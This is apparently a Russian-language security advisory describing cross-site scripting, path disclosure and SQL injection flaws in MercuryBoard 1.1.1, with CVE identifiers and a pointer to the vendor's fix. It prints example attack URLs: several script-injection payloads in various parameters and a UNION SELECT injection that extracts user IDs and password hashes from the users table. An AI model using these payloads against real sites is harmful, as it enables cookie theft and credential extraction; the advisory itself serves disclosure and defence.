Security Lab

Раскрытие информации, межсайтовый скриптинг и SQL-инъекция в MercuryBoard

Дата публикации:26.01.2005
Дата изменения:20.05.2008
Всего просмотров:1219
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2005-0306
CVE-2005-0307
CVE-2005-0414
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: MercuryBoard 1.x
Уязвимые версии: MercuryBoard 1.1.1

Описание:
Уязвимость в MercuryBoard позволяет удаленному пользователю произвести XSS нападение, выполнить SQL-инъекцию и получить информацию об установочной директории приложения на сервере.

Уязвимость сущетвуте из-за недостаточной проверки данных в параметре ‘s’ сценария 'func/pm.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере целевого пользователя. Пример:

http://[target]/index.php?a=pm&s= '><script>alert(document.cookie)</script>

Недостаточная обработка данных в параметре ‘i’ сценария 'func/members.php' позволяте удаленному пользователю произвести XSS нападение. Пример:

http://[target]/index.php?a=members&l= '><script>alert(document.cookie)</script>

Также уязвимы другие параметры: http://[target]/index.php?a='><script>alert(document.cookie)</script >
http://[target]/index.php?a=post&s='><script>alert(document.cookie)</script>
http://[target]/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>
htt p://[target]/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>
http://[target]/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>
http://[target]/index.php?a=cp&s='><script>alert(document.cookie)</script>

Удаленный пользователь может получить информацию об установочной директории на сервере из-за уязвимости в сценарии 'global.php'. Пример:

http://[target]/index.php?a=forum&f=2&min=0&n=0

Также уязвимы сценарии:

lib/jpgraph/jpgraph_bar.php
lib/jpgraph/jpgraph_log.php
lib/jpgraph/jpgraph_polar.php
admincp/admin.php
и все сценарии в директории func.

Удаленный авторизованный пользователь может выполнить произвольные SQL команды на системе. Пример:

http://[target]/index.php?a=post&s=reply &t=0%20UNION%20SELECT%20user_id, %20user_password%20FROM%20mb_users%20/*

URL производителя: http://www.mercuryboard.com

Решение: Установите обновление
http://www.mercuryboard.com/index.php?a=downloads

Ссылки: Multiple vulnerabilities in MercuryBoard 1.1.1